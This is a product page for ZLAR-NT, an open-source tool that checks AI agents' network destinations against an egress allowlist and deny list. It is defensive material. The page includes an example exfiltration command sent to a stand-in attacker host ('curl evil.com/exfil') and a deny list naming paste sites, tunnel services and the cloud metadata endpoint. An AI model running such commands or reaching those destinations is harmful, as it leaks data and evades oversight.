ZLAR-NT ยท Open Source ยท Apache 2.0

ZLAR-NT

The gate catches the command. NT checks the destination.

Application-level network egress policy for AI agents. Domain-aware. Cross-platform. No root required. The missing layer between command-level rules and kernel firewalls.

Get Started โ†’ Read the Legal

The Gap NT Fills

curl is curl. Until it isn't.

curl github.com      โ†’ gate sees "curl" โ†’ blocked
curl evil.com/exfil  โ†’ gate sees "curl" โ†’ blocked

Both are curl. Both get the same gate response. One is fine. One is data exfiltration. The gate can't tell the difference โ€” it classifies commands, not destinations.

ZLAR-NT fills this gap. When the gate passes a network command to NT for destination checking, NT evaluates the URL against your egress policy and returns allow or deny. The gate acts on that decision.


Commands

Eight commands.

CommandWhat it does
checkCheck a single URL against egress policy (exit 0 = allow, exit 1 = deny)
scanScan all current network connections against policy
watchContinuous monitoring โ€” alerts on new connections matching deny rules
resolveResolve a domain to IPs and check each against CIDR rules
policyList, validate, or explain egress policy rules
reportGenerate summary of network activity from NT logs
auditShow NT decision log โ€” what was allowed, denied, when, why
batchCheck multiple URLs from a file or stdin

Default Policy

Deny-first. Known-good allowlist.

Allowed by default
  • github.com, api.github.com, raw.githubusercontent.com
  • npmjs.org, registry.npmjs.org
  • pypi.org, files.pythonhosted.org
  • api.anthropic.com
  • api.openai.com
  • developer.mozilla.org, docs.python.org
Denied by default
  • RFC 1918 (10.x, 172.16-31.x, 192.168.x)
  • Cloud metadata endpoints (169.254.169.254)
  • CGNAT range (100.64.0.0/10)
  • Known exfiltration targets (pastebin, webhook.site, requestbin)
  • Tunnel services (ngrok, bore.pub, localtunnel)
  • Tor exit nodes and onion services
  • All other destinations (default deny)

Gate Integration

One line in your policy.

Configure the gate to call NT before allowing network commands:

zlar-nt check "$URL" --quiet --source gate
# Exit 0 = allow  Exit 1 = deny

The gate passes the URL. NT resolves the domain, checks it against your egress policy, and returns a binary decision. The gate acts on it. No configuration changes required in NT โ€” it reads your egress policy at check time.


NT vs ZLAR-OC pf

Complementary layers.

ZLAR-OC pfZLAR-NT
LayerKernel (packet filter)Application (policy advisory)
PlatformmacOS onlyCross-platform (macOS, Linux)
EnforcementBlocks packetsReports allow/deny decisions
RulesIP + portDomain + IP + CIDR + port
Root requiredYesNo
DNS-awareNoYes

Use ZLAR-OC pf for OS-level network containment on macOS. Use NT for application-level domain-aware policy โ€” especially when running on Linux or when you need domain names rather than IP ranges.


Known Limitations

What ZLAR-NT doesn't do.

NT does not block traffic. It reports policy decisions. Enforcement comes from the gate engine or kernel-level tools like pf.

DNS resolution is point-in-time. A domain's IP can change between resolution and connection. NT cannot detect this.

IPv6 CIDR matching is not implemented. IPv4 only for CIDR rules.

lsof output parsing is best-effort. Results may vary across OS versions and configurations.

Not a substitute for network security tools. NT is a policy advisory layer for AI agent governance โ€” not a firewall, IDS, or DLP system.


The ZLAR Family

Seven products. One thesis.

ProductPlatformWhat it does
ZLAR-OCOpenClawOS-level containment โ€” user isolation, kernel sandbox, pf firewall, gate daemon, signed policy, audit trail
ZLAR-CCClaude CodeHook-based gate โ€” tool-call interception, risk classification, signed policy, Telegram approval
ZLAR GateClaude Code + Cursor + WindsurfUniversal gate โ€” one policy across multiple editors, framework-specific adapters
ZLAR-LTClaude Code + Cursor + WindsurfZero-config governance โ€” one command, instant protection, deny-heavy defaults
ZLAR-AUZLAR Gate audit trailCompliance reporting โ€” hash chain verification, framework mapping, Splunk export
ZLAR-NTCross-platformNetwork egress policy โ€” destination-aware, domain-level, gate-integrated
ZLAR-FLCross-platformFleet governance โ€” registry, health monitoring, audit aggregation, policy comparison

Built by Vincent Nijjar and ZLAR Inc.
Open source under Apache License 2.0. Free to use, modify, and distribute.